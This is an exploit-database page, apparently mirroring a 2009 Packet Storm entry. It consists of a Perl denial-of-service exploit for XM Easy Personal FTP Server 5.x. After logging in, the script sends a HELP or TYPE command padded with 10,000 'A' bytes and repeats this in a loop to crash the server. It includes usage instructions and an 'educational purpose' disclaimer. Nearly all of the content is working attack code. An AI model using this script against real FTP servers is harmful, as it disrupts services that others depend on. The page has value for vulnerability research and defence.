Lucene search
+L

XM Easy Personal FTP Service Denial Of Service

🗓️ 11 Jun 2009 00:00:00Reported by Vinod SharmaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

XM Easy Personal FTP Service Denial Of Service via "HELP" or "TYPE" comman

Code
`#!usr/bin/perl -w  
  
#######################################################################################  
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service  
# via a "HELP" or "TYPE" command with an overly long argument.  
# Refer:  
# http://secunia.com/advisories/35271/  
# Original advisory avaiable at: http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/  
# Product link: http://www.dxm2008.com/  
#  
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$  
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$  
#  
# Author: Vinod Sharma  
# Email: vinodsharma[underscore]mimit[at]gmail.com  
# Blog: http://securitygyan.com/  
# Date: 09th june, 2009  
#   
#  
###Thanks all the Security Folks###  
########################################################################################  
  
use IO::Socket;  
  
my $server_ip=$ARGV[0];  
my $server_port=$ARGV[1];  
my $username=$ARGV[2];  
my $password=$ARGV[3];  
my $command=$ARGV[4];  
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";   
  
if(($#ARGV + 1)!=5)  
{  
print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";  
print "\nargument command can have a value HELP or TYPE\n";  
print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP";  
  
exit;  
}  
  
  
$socket = new IO::Socket::INET (PeerAddr =>$server_ip, PeerPort => $server_port, Proto => 'tcp', ) or die "Couldn't connect to Server\n";  
  
  
while (1)  
{  
  
$socket->recv($recv_data,1024);  
print "RECIEVED: $recv_data";   
  
$send_data1 ="USER ".$username."\r\n";  
$socket->send($send_data1);  
$socket->recv($recv_data1,1024);  
print "RECIEVED: $recv_data1";   
  
$send_data2 ="PASS ".$password."\r\n";  
$socket->send($send_data2);  
$socket->recv($recv_data2,1024);  
print "RECIEVED: $recv_data2";   
  
  
$socket->send($buffer);  
print "\nAttack is send.....................\n";  
$socket->recv($recv_data3,1024);  
print "RECIEVED: $recv_data3";   
  
close $socket;  
  
}   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jun 2009 00:00Current
7.4High risk
Vulners AI Score7.4
17